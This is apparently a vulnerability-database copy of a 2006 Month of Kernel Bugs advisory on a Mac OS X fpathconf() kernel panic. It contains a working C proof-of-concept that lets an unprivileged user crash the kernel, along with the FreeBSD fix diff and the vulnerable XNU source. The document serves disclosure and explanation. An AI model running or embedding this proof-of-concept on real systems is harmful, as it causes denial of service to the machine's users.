Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15006
HistoryNov 11, 2006 - 12:00 a.m.

MOKB-09-11-2006

2006-11-1100:00:00
vulners.com
11
JSON

Title: Mac OS X fpathconf() syscall denial of service Warning - wet floor!
Description: Failure to handle unknown file types by the Mac OS X kernel (XNU) fpathconf() syscall causes a kernel panic, leading to an exploitable local denial of service by non-privileged users. The bug was fixed by FreeBSD on Tue Jun 27 23:08:36 2000 UTC (6 years, 4 months ago).
Author/Contributor: Ilja Van Sprundel - found issue, reported to Apple time ago (silently, yet partially, fixed; thus still broken).
LMH <lmh[at]info-pull.com> - MOKB release, "proof of concept".
References:

Proof of concept or exploit: One-liner:

#include <unistd.h>
#include <semaphore.h>

int main() {
fpathconf(sem_open("DaringWussball", O_CREAT, S_IRWXU, 1), 0);
}

Debugging information:

It's been tested on an up-to-date (09-11-2006) Mac OS X installation, running on an Intel "shipping" Mac.

rome:~ lmh$ uname -a
Darwin rome.local 8.8.1 Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006;
root:xnu-792.13.8.obj~1/RELEASE_I386 i386 i386

===================================================================
RCS file: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v
retrieving revision 1.84
retrieving revision 1.85
diff -u -p -r1.84 -r1.85
— src/sys/kern/kern_descrip.c 2000/05/26 02:04:33 1.84
+++ src/sys/kern/kern_descrip.c 2000/06/27 23:08:36 1.85 <— 6 years, 4 months ago
@@ -36,7 +36,7 @@

  • SUCH DAMAGE.
  • @(#)kern_descrip.c 8.6 (Berkeley) 4/19/94
    • $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.84 2000/05/26 02:04:33 jake Exp $
    • $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.85 2000/06/27 23:08:36 alfred Exp $
      */

#include "opt_compat.h"
@@ -642,7 +642,7 @@ fpathconf(p, uap)
return (VOP_PATHCONF(vp, uap->name, p->p_retval));

default:

  •   panic&#40;&quot;fpathconf&quot;&#41;;

  •   return &#40;EOPNOTSUPP&#41;;
    }
    /NOTREACHED/
    }

------ xnu-792.6.76/bsd/kern/kern_descrip.c
/*

  • Return pathconf information about a file descriptor.
    */
    int
    fpathconf(p, uap, retval)
    struct proc *p;
    register struct fpathconf_args *uap;
    register_t *retval;
    {
    int fd = uap->fd;
    struct fileproc *fp;
    struct vnode *vp;
    struct vfs_context context;
    int error = 0;
    short type;
    caddr_t data;

    AUDIT_ARG(fd, uap->fd);
    if ( (error = fp_lookup(p, fd, &fp, 0)) )
    return(error);
    type = fp->f_type;
    data = fp->f_data;

    switch (type) {

    case DTYPE_SOCKET:
    (…)
    error = 0;
    goto out;

    case DTYPE_PIPE:
    *retval = PIPE_BUF;
    error = 0;
    goto out;

    case DTYPE_VNODE:
    (…)
    goto out;

    case DTYPE_PSXSHM:
    case DTYPE_KQUEUE:
    error = EINVAL;
    goto out;

    default:
    panic("fpathconf (unrecognized - %d)", type); <----- not covered cases, panic.
    }
    /NOTREACHED/
    out:
    fp_drop(p, fd, fp, 0);
    return(error);
    }
    ------ xnu-792.6.76/bsd/kern/kern_descrip.c

JSON